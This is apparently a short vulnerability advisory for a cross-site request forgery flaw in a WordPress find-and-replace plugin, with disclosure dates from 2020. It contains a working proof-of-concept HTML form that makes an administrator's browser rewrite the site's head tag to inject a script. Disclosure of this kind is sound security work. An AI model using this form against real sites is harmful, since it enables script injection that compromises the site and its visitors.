This flaw could allow any user to inject malicious Javascript anywhere on a site if they could trick a site’s administrator into performing an action, like clicking on a link in a comment or email.
<html> <body> <form action="http://URL/wp-admin/tools.php?page=real-time-find-and-replace" method="POST"> <input type="hidden" name="setup-update" value="" /> <input type="hidden" name="farfind[0]" value="<head>" /> <input type="hidden" name="farreplace[0]" value="<script>alert(1)</script>" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Chloe Chamberland
Chloe Chamberland
No
2020-04-27 (about 2 years ago)
2020-04-27 (about 2 years ago)
2020-05-29 (about 2 years ago)